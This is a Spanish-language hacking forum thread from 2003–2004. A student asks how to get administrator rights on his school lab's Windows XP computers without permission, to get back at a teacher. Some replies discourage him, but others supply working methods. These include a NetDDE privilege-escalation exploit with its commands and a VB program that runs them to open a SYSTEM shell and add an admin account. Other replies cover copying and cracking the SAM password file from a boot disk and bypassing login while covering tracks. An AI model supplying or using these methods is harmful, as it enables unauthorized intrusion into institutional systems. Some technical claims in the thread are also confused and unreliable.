|
vendett@
|
 |
« : Septiembre 11, 2003, 06:22:04 » |
|
Hola !!! Soy de M?xico y estudio en el IPN, en computacion tengo una de esas maestras que creen saberlo todo cuando apenas saben crear directorios en MS-DOS y se equivocan, y para que deje de alardear me he propuesto encontrar la contrase?a de las computadoras del laboratorio, sin embargo estan tres usuarios creados adminstrador, profesor y alumno, como alumno no tengo acceso a nada de configuraci?n, he intentado utilizar algunos programitas para encontrar las claves guardadas pero ni la del salvapantallas obtengo, he buscado informacion sobre las debilidades de XP, pero hasta el momento solo encuentro debilidades basadas en sistemas conectados a una red, asi que les pido ayuda, ?como logro saltar los permisos de usuario en el sistema, cuando solo tengo el password de usuario Alumno y no puedo acceder a ninguna herramienta de configuracion? es XP profesional :blink: |
|
|
|
|
En línea
|
Dios no creo al hombre... el hombre creo a Dios ---> Karl Marx
|
|
|
Zheo
Grupo_Moderadores
Miembro Imprescindible
Mensajes: 1.408
|
|
« Respuesta #1 : Septiembre 11, 2003, 08:41:29 » |
|
Pues en mi facultad cuando un profesor se equivoca, se le discuste y normalmente rectifican, no hace falta ir sacando passwords para las cuentas de nadie. <_<
?Por cierto, luego qu? vas a hacer con el password? ?Ense?arselo a la profesora? :?
Deber?as buscar un poco m?s, como por ejemplo intentar copiar un archivo de contrase?as utilizando un disco de recuperaci?n que te hagas. No estoy muy puesto en este campo, pero me da que XP + Acceso f?sico al terminal = muchas posibilidades.
Un saludo.
|
|
|
|
|
En línea
|
|
|
|
|
^LyMpEx^
Visitante
|
|
« Respuesta #2 : Septiembre 11, 2003, 12:32:44 » |
|
Hola vendett@, encontr? esto en un foro. Es un exploit GetAdmin, as? k si eres adminstrador, te ahorras coger la pass del administrador xDy algunos d?as de desencriptaci?n del sam  - NetDDE exploit: Primero debemos iniciar el servicio NetDDE si no lo estuviera ya. La mayoria de las cuentas de usua- rio no tienen los privilegios para ello pero los miembros del grupo Operadores si que los tienen. Para iniciar el servicio desde la linea de comandos: C:\ >net start netdde Si ejecutamos la herramienta sin ningun argumento nos mostrara la sintaxis correcta para su utilizacion. Ahora debemos ejecutar el exploit especificando el recurso compartido de confianza con la opcion -s, asi como el comando que se quiere ejecutar: Ejemplo que nos abre una consola de comandos en el contexto de la cuenta SYSTEM: C:\ >netddemsg -s Chat$ cmd.exe A continuacion podemos a?adir la cuenta con la que hemos accedido al sistema al grupo de Adminis- tradores ejecutando: C:\ >net localgroup administradores cuenta /add Hice este exploit en vb. Private Sub Form_Load()
On Error Resume Next
Open "C:\Jockstrap.txt" For Output As #1
Print #1, "@echo off"
Print #1, "cls"
Print #1, "net start netdde"
Print #1, "netddemsg -s Chat$ cmd.exe"
Print #1, "net localgroup administradores foro/hacker"
Close #1
Name "C:\Jockstrap.txt" As "C:\Jockstrap.bat"
Shell "C:\Jockstrap.bat"
Kill "C:\Jockstrap.bat"
End
End Sub
Si este no te funcionase, ak? tienes otro k te crea el usuarios "X" con la pass "X". Primero crea el usuario, y despues lo a?ade al grupo de administradores :lol: Espero que te sirva PD: Tambi?n puedes hacer como yo, pikar a la profesora, y kedar un dia y aver kien puede m?s. Entras por netbios a las pcs de la red. Usas el pqwak, y adios pass (si es k las tiene  ) Ad+ si es tan ignorante como dices, con eso de netbios se kedar? boquiabierta :huh: |
|
|
|
« Última modificación: Septiembre 11, 2003, 12:42:01 por ^LyMpEx^ »
|
En línea
|
|
|
|
|
H64
|
|
« Respuesta #3 : Septiembre 11, 2003, 02:31:46 » |
|
pues yo coinsido con mi camarada Zheo pork? bueno para k diablos kieres hacer eso mejor si tanto te interesa saber los fallos de seguiridad de tu escuela primero practica en tu casa o no se pero mejor dejate de eso, solo te vas a meter en problemas ya k ha cierto "ni?o" lo suspendieron dos semanas por meter un disco 3 1/2 al laboratorio  (no se kien sera jeje) y guuuauuu WinXP para mi es el k mas errores tiene, es mucho mas vulnerable, (no hay como mi W2K) camarada vendett@ no creas k al haickear unas makinitas con un SO tan vulnerable como lo es el mencionado te sentiras mejor, mira despues de eso k? publicaras los pass en el ma?ana? (periodico mexicano) yo creo k no pagaras $65 dlls. por un octavo de pagina para publicarlos (yo no lo haria) Pues en mi facultad cuando un profesor se equivoca, se le discuste y normalmente rectifican, no hace falta ir sacando passwords para las cuentas de nadie. yo kreo k eso es lo mas correcto he indicado, asi los dos tendras un conocimiento mas ya k en este tema de la informatica siempre hay k estar actualizandose no crees? ais kuando tu tengas una duda, la profe tambien te ayudara con gusto y no pensara mmmmmmmmm.. :angry: ese el el che ni?o k trato de hacerme kdar mal :angry: , solo es un comentario para k pienses en el al momento de estar frente al XP salud  hast64... |
|
|
|
« Última modificación: Septiembre 11, 2003, 02:32:46 por Hast64 »
|
En línea
|
Quien atribuye a la crisis sus fracasos y penurias violenta su propio talento y respeta m
|
|
|
|
Intruder
Visitante
|
|
« Respuesta #4 : Septiembre 11, 2003, 03:14:02 » |
|
Si hay algo que aprendi en la escuela es a NO jugar con las computadoras. Esto es; que solo las puedes ver y teclear lo que te diga el ingeniero, maestro(a) etc.. <_<
Como las computadoras estan en red, en una ocasion le envie un sutil mensaje a un colega, que decia: "Que haces saco de masa putrefacta". Y la maestra me reprendio
me apago la computadora y me corrio de la sala :cry:
Ahora solo me dedico a ver las computadoras y tengo miedo de que el maestro o ingeniero(a) me vayan a hechar de nuevo. :unsure:
NOta: no puse acentos, porque este taclado esta muy extra?o.
|
|
|
|
|
En línea
|
|
|
|
|
-=ZheLLo=-
Visitante
|
|
« Respuesta #5 : Septiembre 11, 2003, 04:35:15 » |
|
Hola !!!
Soy de M?xico y estudio en el IPN, en computacion tengo una de esas maestras que creen saberlo todo cuando apenas saben crear directorios en MS-DOS y se equivocan, y para que deje de alardear me he propuesto encontrar la contrase?a de las computadoras del laboratorio, sin embargo estan tres usuarios creados adminstrador, profesor y alumno, como alumno no tengo acceso a nada de configuraci?n, he intentado utilizar algunos programitas para encontrar las claves guardadas pero ni la del salvapantallas obtengo, he buscado informacion sobre las debilidades de XP, pero hasta el momento solo encuentro debilidades basadas en sistemas conectados a una red, asi que les pido ayuda, ?como logro saltar los permisos de usuario en el sistema, cuando solo tengo el password de usuario Alumno y no puedo acceder a ninguna herramienta de configuracion? es XP profesional :blink: mmm si despues de todo lo ke te an dixo sigues keriendo obtener la pass del admin... imagino ke la manera mas sencilla seria iniciar la makina cn un disko de inicio de win98 y copiar c:\winnt\system32\config\sam y sam.log (winnt = directorio de win) luego buscar un desencriptador de sam y sakar la pass del admin no se si el cain 2.5 ace esto, yo no lo e usado nunca :blush: PD: te recomiendo ke si aces esto te lo calles y si aces algo reza xq no se entere de kien fue la profesora xq si dices q presume tanto..... no se lo ke te aria xDDDDD |
|
|
|
|
En línea
|
|
|
|
Zheo
Grupo_Moderadores
Miembro Imprescindible
Mensajes: 1.408
|
|
« Respuesta #6 : Septiembre 11, 2003, 06:00:04 » |
|
|
|
|
|
« Última modificación: Septiembre 11, 2003, 06:10:31 por Zheo »
|
En línea
|
|
|
|
|
-=ZheLLo=-
Visitante
|
|
« Respuesta #7 : Septiembre 11, 2003, 06:08:53 » |
|
oiba no me abia dado cuenta xDDDDDDD bueno si la profesora es asin kiza lo tenga en fat32 si esta en ntfs.... arranka cn knopix |
|
|
|
|
En línea
|
|
|
|
NAT
Grupo_Moderadores
Experto
Mensajes: 415
|
|
« Respuesta #8 : Septiembre 11, 2003, 06:12:54 » |
|
Mis jefes son igual que tu profesora y por eso no me pongo a intentar colarme en los servidores de la empresa...
Saludos.
PD: Alguien sabe como ganar dinero sin trabajar, que no sea ni robando ni piendolo???
|
|
|
|
|
En línea
|
Para beber no hace falta divertirse... |
|
|
Zheo
Grupo_Moderadores
Miembro Imprescindible
Mensajes: 1.408
|
|
« Respuesta #9 : Septiembre 11, 2003, 06:15:55 » |
|
Si, haz una canci?n, m?tete a directivo de la SGAE y a cobrar por el canon... eso si que es cobrar sin hacer nada, aunque me temo que yo considerar?a que lo est?s robando.
Un saludo.
|
|
|
|
|
En línea
|
|
|
|
|
cuervo
Visitante
|
|
« Respuesta #10 : Septiembre 11, 2003, 06:36:27 » |
|
porque mejor no le demuestras que sabes en clase?? esto me suena a querer impresionar a alguien , cosa que no creo que hagas porque estas pidiendo ayuda, no concuerdo con Hast64 en lo que menciona que es un so vulnerable <_< de hecho XP esta basado en win 2000 y NT y bien parchado y configurado tiene buena seguridad , por otro lado y solo como comentario la contrase?a se guarda en el archivo sam , debes usar un programa para desencriptar que dependiendo de la velocidad de tu maquina y de la dificultad de la contrase?a puede tardar desde 5 min hasta 1 dia, (por cierto cain solo funciona en fat) esto es suponiendo que puedas sacar el archivo sam, la otra forma es iniciar en modo a prueba de fallos y cruzar los dedos de que no le haigan puesto contrase?a a la cuenta de administrador.
|
|
|
|
|
En línea
|
|
|
|
|
cuervo
Visitante
|
|
« Respuesta #11 : Septiembre 11, 2003, 06:42:50 » |
|
tambien puedes mirar aqui foros hispabyte |
|
|
|
|
En línea
|
|
|
|
|
H64
|
|
« Respuesta #12 : Septiembre 11, 2003, 07:45:14 » |
|
cada caveza es un mundo camarada crow (la de arriba jejeje) ok. y en serio no se pork el WinXP salio tan chafa si se supone k esta basado en NT y 2000, si salio despues del W2K (grandioso este SO) pero asi esl Microsofth y su misteriosa mente retercida de billie y tambien...pues no manches Zheo volviste a hacer de las tuyas jajaja ahora lo guapo es explicar como copiar un archivo en NTFS a FAT con el disquette de windows 98 me imagino yoooo, k trataba de decir k con un disco de arank o algo asi pero el punto esk en serio hiciste k llorara de risa jajja (mil y una mas disculpas si molesto a alguine es solo lo hago con el echo de expresarme)... pero mira eso de keres haickear una makina con el objeticvo de molestar solo son ni?adas como... "... hasta los webos de ni?atos que kieren ser jaikers sin pretender hacer el m?s m?nimo esfuerzo,
ni colaborar, ni contribuir, ni ayudar en lo m?s m?nimo (aunque s?lo sea pulsando un pu?etero y discreto banner).
S?lo kieren ser jaikers diciendo bobadas e idioteces sin ninguna gracia, kriticando, menospreciando
e imponiendo sus supuestos "derechos" sobre todo el que se les kruza en el camino, y por
supuesto, consumiendo los recursos que un generoso caballero pone gratuitamente
a disposici?n de la comunidad.
Para ellos, jaiker es sin?nimo de "joputa que jode a los dem?s" y por eso kieren
ser los m?s grandes jaikers, ... pa joer muchas cosas."
by D_kepeer
sin ofender un saludo hast64... |
|
|
|
« Última modificación: Septiembre 11, 2003, 07:46:42 por Hast64 »
|
En línea
|
Quien atribuye a la crisis sus fracasos y penurias violenta su propio talento y respeta m
|
|
|
|
oversight
Visitante
|
|
« Respuesta #13 : Noviembre 04, 2003, 04:45:41 » |
|
Lei esto hace algun tiempo asi ke no es muy presiso y te tocara averiguar algunas cosas, pero hey, nada es gratis. Mira WinXP es un "muro mas alto" pero "con mas puertas". Piensa esto, la pass de cada usuario se guarda en un archvio, inicia en modo ms-dos con un disco de arranque y entra en los directorios de el user ke kieras, la verdad no recuerdo el nombre del archivo y aun asi, si tanto kieres andar odiendo a tu profe, minimo has algo de investigacion, pero existe. solo cambia el nombre del archivo (oviamente no olvides el anterior) y reinicia. escoje la opcion del usuario ke kieras -ya en win- y escribe cualkier contrase?a, como el sistema no encontrara el archivo ke guarda la pass sera como si no tuviera, y ya adentro puedes hacer de tu * un papalote, pero despues restaura el archivo de la pass, no olvides ke lo dificil no es entrar en un sistema, si no no dejar huellas. No he tenido la oportunidad de comprobar si funciona, lo lei por hay en una de mis curiosidades pero vale la pena intentarlo.
Aun asi, mas de la mitad de kienes tienen acceso a una pc son torpes en ms-dos, al grado de pensar ke una computadora ke solo tiene ms-dos es inutil, dime vas a entrar en las computadoras de todas esas personas?
|
|
|
|
|
En línea
|
|
|
|
|
why_not?
Visitante
|
|
« Respuesta #14 : Enero 02, 2004, 05:20:26 » |
|
Hace mucho tiempo que salio este tema, pero viendo que no se hayo ninguna respuesta clara voy a explicar algo.
Yo soy administrador en mi universidad y tengo un amigo con el que "comprobamos" la seguridad. En mi uni hay win2000 y Debian en todas las maquinas y conseguir la sam es muy sencillo si los administradores nos descuidamos un poco. El procedimiento es muy simple: como se ha comentado las pass estan en el archivo SAM y ese es el objetivo. Primero rezar para que este activado el arranque desde otro sitio que no sea el HD. Si es as?, arrancar con un disco de 98 o 95, es indiferente, ya que si lo hacemos desde uno de win2000 reconocera el sistema y los privilegios y nos denegara acceso a dicho archivo. Como el 98 y 95 trabajaban en FAT32 y probablemente el win2000 en NTFS no se reconocera ninguna particion, asi que se monta una unidad NTFS con el programa adecuando (los hay porque los he usado)y se copia el famoso archivo al disquette. Una vez que lo tenemos nos lo llevamos a casita y lo desencriptamos tranquilamente.
Resumen: solo hace falta que se pueda arrancar desde el CD, el disquette o cualquier otro sitio distinto al HD. Si no es asi, en mi uni, desde Debian se podria hacer, de todas formas si alguien le interesa el segundo metodo, que lo diga.
Un saludo a todos
|
|
|
|
« Última modificación: Enero 02, 2004, 05:21:52 por why_not? »
|
En línea
|
|
|
|
|
Portal
Suscribete
Seguridad y Redes
